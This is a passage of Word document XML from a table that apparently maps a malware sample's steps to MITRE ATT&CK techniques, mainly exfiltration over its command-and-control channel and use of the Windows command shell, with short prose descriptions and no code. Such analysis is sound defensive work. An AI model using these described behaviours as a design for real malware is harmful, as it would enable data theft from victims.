              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6E3C0CB6" w14:textId="23527F86" w:rsidR="006115B2" w:rsidRPr="004A37AE" w:rsidRDefault="006115B2" w:rsidP="006115B2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>G</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="982" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="30996B5B" w14:textId="6DAF3860" w:rsidR="006115B2" w:rsidRPr="004A37AE" w:rsidRDefault="003E6738" w:rsidP="006115B2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="08B85EE6" w14:textId="39F79DE4" w:rsidR="006115B2" w:rsidRDefault="00BA46D7" w:rsidP="006115B2">
            <w:r>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r w:rsidR="006115B2">
              <w:t>After every action is performed the malware sends a response to the control server indicating whether the action was successful</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005E7360" w:rsidRPr="005E7360" w14:paraId="3A34168A" w14:textId="77777777" w:rsidTr="006115B2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="33326338" w14:textId="7D50166E" w:rsidR="006115B2" w:rsidRPr="005E7360" w:rsidRDefault="006115B2" w:rsidP="006115B2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005E7360">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00083830" w:rsidRPr="005E7360">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1956" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2F151856" w14:textId="32BCF593" w:rsidR="006115B2" w:rsidRPr="005E7360" w:rsidRDefault="006115B2" w:rsidP="006115B2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005E7360">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="005E7360">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>001</w:t>
            </w:r>
            <w:r w:rsidR="00C14818">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
            <w:r w:rsidRPr="005E7360">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="005E7360">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00C14818">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Exfiltration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2463" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="57536F89" w14:textId="77777777" w:rsidR="006115B2" w:rsidRPr="005E7360" w:rsidRDefault="006115B2" w:rsidP="006115B2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005E7360">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="005E7360">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>1041 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="005E7360">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Exfiltration Over C2 Channel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="663" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="36EAC1DF" w14:textId="21A75725" w:rsidR="006115B2" w:rsidRPr="005E7360" w:rsidRDefault="00597A2E" w:rsidP="006115B2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005E7360">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="22623286" w14:textId="77777777" w:rsidR="006115B2" w:rsidRPr="005E7360" w:rsidRDefault="006115B2" w:rsidP="006115B2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="602C38CE" w14:textId="1BC892B8" w:rsidR="006115B2" w:rsidRPr="005E7360" w:rsidRDefault="006115B2" w:rsidP="006115B2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005E7360">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="982" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="671C5F73" w14:textId="5CD8D1F1" w:rsidR="006115B2" w:rsidRPr="005E7360" w:rsidRDefault="00AC3381" w:rsidP="006115B2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>IF</w:t>
            </w:r>
            <w:r w:rsidR="002C3314">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>C2C/</w:t>
            </w:r>
            <w:r w:rsidR="00C14818">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>AO-EXF</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4686BE01" w14:textId="1D4E5874" w:rsidR="006115B2" w:rsidRPr="005E7360" w:rsidRDefault="00BA46D7" w:rsidP="006115B2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005E7360">
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r w:rsidR="006115B2" w:rsidRPr="005E7360">
              <w:t>Read a specified file’s contents and send the data to the control server</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006115B2" w:rsidRPr="004A37AE" w14:paraId="4C93C2C6" w14:textId="77777777" w:rsidTr="006115B2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="75CF41B6" w14:textId="43984BB2" w:rsidR="006115B2" w:rsidRPr="004A37AE" w:rsidRDefault="006115B2" w:rsidP="006115B2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00083830">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1956" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2B18D370" w14:textId="77777777" w:rsidR="006115B2" w:rsidRPr="004A37AE" w:rsidRDefault="006115B2" w:rsidP="006115B2">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72742DF3" w14:textId="77777777" w:rsidR="006115B2" w:rsidRPr="0035641D" w:rsidRDefault="006115B2" w:rsidP="006115B2">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6E13C14E" w14:textId="0B5747DC" w:rsidR="006115B2" w:rsidRPr="004A37AE" w:rsidRDefault="00BD3B3A" w:rsidP="006115B2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00597A2E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3C251616" w14:textId="77777777" w:rsidR="006115B2" w:rsidRPr="004A37AE" w:rsidRDefault="006115B2" w:rsidP="006115B2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="257BD698" w14:textId="78B16213" w:rsidR="006115B2" w:rsidRPr="004A37AE" w:rsidRDefault="006115B2" w:rsidP="006115B2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="982" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="06EBBB42" w14:textId="454CBAB5" w:rsidR="006115B2" w:rsidRPr="004A37AE" w:rsidRDefault="003E6738" w:rsidP="006115B2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1C7B9870" w14:textId="5ACD07FF" w:rsidR="006115B2" w:rsidRDefault="006115B2" w:rsidP="006115B2">
            <w:r>
              <w:t>Next command in from control in this case as below</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005E7360" w:rsidRPr="005E7360" w14:paraId="11F92DFB" w14:textId="77777777" w:rsidTr="006115B2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0882B4BB" w14:textId="7C116E8C" w:rsidR="006115B2" w:rsidRPr="005E7360" w:rsidRDefault="006115B2" w:rsidP="006115B2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005E7360">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00083830" w:rsidRPr="005E7360">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1956" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="195C31CB" w14:textId="0F0BCB9D" w:rsidR="006115B2" w:rsidRPr="005E7360" w:rsidRDefault="00C14818" w:rsidP="006115B2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005E7360">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="005E7360">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>001</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
            <w:r w:rsidRPr="005E7360">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="005E7360">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Exfiltration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2463" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="00EEF3A5" w14:textId="77777777" w:rsidR="006115B2" w:rsidRPr="005E7360" w:rsidRDefault="006115B2" w:rsidP="006115B2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005E7360">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="005E7360">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>1041 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="005E7360">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Exfiltration Over C2 Channel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="663" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6A05AB93" w14:textId="014D8755" w:rsidR="006115B2" w:rsidRPr="005E7360" w:rsidRDefault="00BD3B3A" w:rsidP="006115B2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005E7360">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00277882">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6E42F621" w14:textId="77777777" w:rsidR="006115B2" w:rsidRPr="005E7360" w:rsidRDefault="006115B2" w:rsidP="006115B2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="74C9F1AC" w14:textId="014FAE6A" w:rsidR="006115B2" w:rsidRPr="005E7360" w:rsidRDefault="00BD3B3A" w:rsidP="006115B2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005E7360">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="982" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="76940DCD" w14:textId="7B733D7F" w:rsidR="006115B2" w:rsidRPr="005E7360" w:rsidRDefault="00AC3381" w:rsidP="006115B2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>IF-C2C /</w:t>
            </w:r>
            <w:r w:rsidR="003E6738">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>A</w:t>
            </w:r>
            <w:r w:rsidR="00537EED">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>O</w:t>
            </w:r>
            <w:r w:rsidR="003E6738">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>-EXF</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0D98FA2C" w14:textId="77777777" w:rsidR="003E6738" w:rsidRDefault="003E6738" w:rsidP="006115B2">
            <w:r>
              <w:t>Access Begins</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7096A91F" w14:textId="77777777" w:rsidR="003E6738" w:rsidRDefault="003E6738" w:rsidP="006115B2"/>
          <w:p w14:paraId="28E27041" w14:textId="40C2146E" w:rsidR="006115B2" w:rsidRPr="005E7360" w:rsidRDefault="00BA46D7" w:rsidP="006115B2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005E7360">
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r w:rsidR="006115B2" w:rsidRPr="005E7360">
              <w:t>Read a specified file’s contents and send the data to the control server</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006115B2" w:rsidRPr="004A37AE" w14:paraId="5D9E2C24" w14:textId="77777777" w:rsidTr="006115B2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1F65AAC9" w14:textId="58220C14" w:rsidR="006115B2" w:rsidRPr="004A37AE" w:rsidRDefault="006115B2" w:rsidP="006115B2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00083830">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1956" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1A55A821" w14:textId="77777777" w:rsidR="006115B2" w:rsidRPr="004A37AE" w:rsidRDefault="006115B2" w:rsidP="006115B2">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631FBBEC" w14:textId="77777777" w:rsidR="006115B2" w:rsidRPr="0035641D" w:rsidRDefault="006115B2" w:rsidP="006115B2">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537946F1" w14:textId="41AA7956" w:rsidR="006115B2" w:rsidRPr="004A37AE" w:rsidRDefault="00BD3B3A" w:rsidP="006115B2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00597A2E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="15F32897" w14:textId="77777777" w:rsidR="006115B2" w:rsidRPr="004A37AE" w:rsidRDefault="006115B2" w:rsidP="006115B2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="13DA0FCA" w14:textId="395D99E3" w:rsidR="006115B2" w:rsidRPr="004A37AE" w:rsidRDefault="00BD3B3A" w:rsidP="006115B2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BD3B3A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="982" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6EA36F34" w14:textId="067449D7" w:rsidR="006115B2" w:rsidRPr="004A37AE" w:rsidRDefault="003E6738" w:rsidP="006115B2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0EEE0E10" w14:textId="61600422" w:rsidR="006115B2" w:rsidRDefault="006115B2" w:rsidP="006115B2">
            <w:r>
              <w:t>Next command in from control in this case as below</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006115B2" w:rsidRPr="004A37AE" w14:paraId="5C9DAE7B" w14:textId="77777777" w:rsidTr="006115B2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="03094D71" w14:textId="1449B6DA" w:rsidR="006115B2" w:rsidRPr="004A37AE" w:rsidRDefault="006115B2" w:rsidP="006115B2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00083830">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1956" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="16ECA68B" w14:textId="6E5BEA0B" w:rsidR="006115B2" w:rsidRPr="004A37AE" w:rsidRDefault="006115B2" w:rsidP="006115B2">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0FBDE8B6" w14:textId="3A3270D7" w:rsidR="006115B2" w:rsidRPr="0035641D" w:rsidRDefault="006115B2" w:rsidP="006115B2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="008442BB">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1059.003 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="008442BB">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> &lt;Command and Scripting Interpreter&gt;:Windows Command Shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="663" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="039539CE" w14:textId="73FF3FD2" w:rsidR="006115B2" w:rsidRPr="004A37AE" w:rsidRDefault="00BD3B3A" w:rsidP="006115B2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00597A2E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
